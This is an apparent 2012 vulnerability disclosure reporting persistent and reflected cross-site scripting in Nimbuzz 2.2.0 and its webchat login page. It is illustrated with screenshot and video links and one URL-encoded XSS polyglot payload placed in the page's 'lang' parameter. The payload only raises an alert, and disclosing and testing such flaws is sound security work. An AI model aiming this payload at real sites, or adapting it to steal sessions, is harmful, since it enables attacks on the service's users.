*# Exploit Title: Nimbuzz 2.2.0 Cross Site Scripting # Date: 09.04.2012 # Author: Sony # Software Link: http://www.nimbuzz.com/en/get/voip-and-chat-on-pc/pc-client-downloaded # Software Version: 2.2.0 # Web Browser : Mozilla Firefox # Blog : http://st2tea.blogspot.com # PoC:http://st2tea.blogspot.com/2012/04/nimbuzz-220-cross-site-scripting.html ..................................................................* * * *Well, we have xss in the messenger, interesting place for xss) http://1.bp.blogspot.com/-oZCtF5p8yPg/T4LmoWSfz-I/AAAAAAAAA8A/NwcttC0s4c0/s1600/ni.png **We have xss in the Chat Window-->View in Browser. (persistent code) Some pics and video PoC: http://4.bp.blogspot.com/-lDyKyFhqWiU/T4LqFhg9LQI/AAAAAAAAA8M/Mc7FcodbdPM/s1600/nim.JPG http://www.youtube.com/watch?v=t8mC6Oceq0Y **And where is forget password: * http://www.nimbuzz.com/webchat_login?lang=en&step=2&login=error http://www.nimbuzz.com/webchat_login?lang=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E http://2.bp.blogspot.com/-LXxT4HBs80A/T4Lu1IdlbaI/AAAAAAAAA8Y/YyCzOcyh76I/s1600/nimb2.JPG